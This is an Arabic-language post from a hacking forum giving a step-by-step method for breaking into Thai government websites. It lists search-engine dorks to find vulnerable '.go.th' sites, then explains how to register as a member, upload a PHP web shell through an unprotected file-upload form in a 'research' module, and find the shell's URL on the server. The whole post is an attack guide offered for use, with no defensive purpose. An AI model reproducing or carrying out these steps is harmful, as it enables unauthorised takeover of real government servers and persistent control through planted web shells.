:: vBspiders Professional Network :: - ثغرة خطيرة لاختراق المواقع الحكومية (research)

السلام عليكم

Dork 1 :

كود:

site:go.th inurl:name=member+file=index

Dork 2:

كود:

site:go.th inurl:name=research

الصفحة الرئيسية:

كود:

http://www.xxx.go.th/?name=research
 
 http://www.xxx.go.th/index.php?name=research
 
 http://www.xxx.go.th/popup.php?name=research

لرفع الشيل اذهب إلى هذا الرابط:

كود:

http://www.xxx.go.th/?name=research&file=add&op=research_add
 
 http://www.xxx.go.th/index.php?name=research&file=add&op=research_add
 
 http://www.xxx.go.th/popup.php?name=research&file=add&op=research_add

إذا ظهرت رسالة الخطأ هذه:
[

التي تهني : "أنت لست عضوا"

يتوجب عليك التسجيل من هذا الرابط:

كود:

  
 http://www.xxx.go.th/?name=member&file=index
 
 http://www.xxx.go.th/index.php?name=member&file=index
 
 http://www.xxx.go.th/popup.php?name=member&file=index

لرفع الشيل عليك بملأ الحقول كما في الصورة:

http://i48.tinypic.com/23tl7rc.jpg

---------------------------------------------------

بعد ذلك ارجع إلى صفحة البداية لترى ملفك:

كود:

http://www.xxx.go.th/?name=research
 
 http://www.xxx.go.th/index.php?name=research
 
 http://www.xxx.go.th/popup.php?name=research

ثم اضغط على "FullText" كما في الصورة:

http://i48.tinypic.com/prsso.jpg

-----------------------------------------------------------------------------

انتظر عشر ثواني:

http://i46.tinypic.com/k4xwqs.jpg

----------------------------------------------

ثم اضغط على download :

http://i48.tinypic.com/2mo2op2.jpg

سيتم توجيهك الى رابط الشيل الذي يكون كهذا:

كود:

http://www.xxx.go.th/dontry/data/research_1340954535_z.php

ملاحظة مهمة: في كثير من الأحيان لا تعرض الصفحة بطريقة صحيحة فلا يظهر لك هيكل fckeditor لذا يتوجب عليك استخدام متصفح Opera لتجنب ذلك او استخدام الاضافات ك tamper data او auto fill

بالتوفيق للجميع.